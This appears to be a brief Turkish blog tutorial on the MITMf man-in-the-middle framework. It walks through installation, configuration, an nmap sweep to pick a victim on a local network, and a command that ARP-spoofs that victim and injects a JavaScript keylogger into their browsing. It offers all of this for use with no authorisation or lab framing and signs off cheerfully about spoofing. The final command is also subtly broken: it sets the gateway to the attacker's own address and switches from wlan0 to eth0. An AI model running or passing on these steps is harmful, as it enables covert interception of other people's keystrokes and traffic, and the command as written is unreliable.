TR | MITMf Nedir ve Nasıl Kullanılır ?
Merhabalar,
Bu yazımızda MITMf isimli MITM ataklarını gerçekleştirmeye yarayan frameworkü ele alıp inceleyeceğiz. Öncelikle MITM nedir diye bir giriş yapalım.
MITM, Man In the Middle ın kısaltılmış hali olup, hedef ile network trafiğinin arasına girip çeşitli işlemler yapmaya yarayan atak methodudur.
Şimdi asıl işimiz olan MITMf tooluna gelirsek, öncelikle toola buradan ulaşabilirsiniz.
Şimdi uygulamamızı kurmamız için aşağıdaki komutları sırasıyla verelim.
git clone https://github.com/byt3bl33d3r/MITMf.git mitmf pip install -r requirements.txt
Artık atak için hazır durumdayız.
Kullanılabilir pluginleri görmek için, “python mitmf.py –help” komutunu kullamamız gerekiyor. Aktif kullanabileceğimiz pluginler:
Şimdi, konfigürasyonlarımızı ayarlamamız gerekiyor. Şu lokasyonda bulunuyor: ‘/usr/share/mitmf/config/mitmf.cfg.’
Yukarıdaki gibi FilePwn kısmına geldiğimizde CompressedFiles bölümünde HOST değerlerini görüyoruz. Bunları kendimize göre ayarlamamız gerekiyor.
Yukardaki gibi ekranı görüyor olacaksınız biraz daha aşağı indiğimizde.
Artık atak için tamamiyle hazırız.
Şimdi terminalden ‘ifconfig’ komutu ile IP ve Interface değerlerimizi öğreniyoruz. Ardından, ‘route -n’ komutu ile gateway değerimizi öğreniyoruz.
wlan0 şeklinde IP mizin 10.200.1.20 , gateway değerimizin, 10.200.1.1 olduğunu varsayalım. Şimdi yapmamız gereken şey, hedefin IPsini alıp gerekli işlemleri gerçekleştirmek. Bunun için:
nmap -sP -T4 10.200.1.0/24
Şeklinde bir NMAP taraması başlatıyoruz. Şimdi hedefimizin IP adresi, 10.200.1.35 olsun.
Biz şu şekilde bir JS Keylogger atak yapabiliriz.
sudo python mitmf.py --arp --spoof --i eth0 --gateway 10.200.1.20 --target 10.200.1.35 --jskeylogger
JS Keylogger benim en sevdiğim özellik olduğu için onu örnek gösterdim.
Diğer yazıda, bir başka teknik anlatmak üzere. İyi spooflamalar 🙂